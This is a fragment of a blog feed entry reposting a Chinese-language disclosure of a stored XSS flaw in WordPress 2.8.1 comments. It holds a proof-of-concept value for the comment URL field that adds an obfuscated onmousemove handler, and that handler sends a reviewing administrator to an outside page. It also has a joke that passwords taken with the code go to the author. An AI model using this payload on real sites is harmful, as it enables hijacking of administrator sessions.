type='text'>作者：空虛浪子心 inbreak.net  ps：感謝鬼仔's blog，XEYE's blog協助測試。  實際上是個XSS漏洞。  POC：   在評論的網址一欄，填寫  http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs' onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);  這段代碼僅供測試，是不能直接用的。  如果你拿我的shellcode去打別人的站，那密碼就歸我了，來之不拒啊。  管理員審核時，只要滑鼠從url上路過，就會跳轉到http://www.inbreak.net/a.php。  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/9174702378544311857'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/9174702378544311857'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/wordpress-281-xss.html' title='WordPress 2.8.1 評論顯示xss漏洞'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh6.ggpht.com/_q2SxxmLWIiM/Sm_uh1Y_HsI/AAAAAAAABEs/FOqIr3_4cg8/s72-c/clip_image001%5B3%5D.jpg?imgmax=800' height='72' width='72'/></entry></feed>
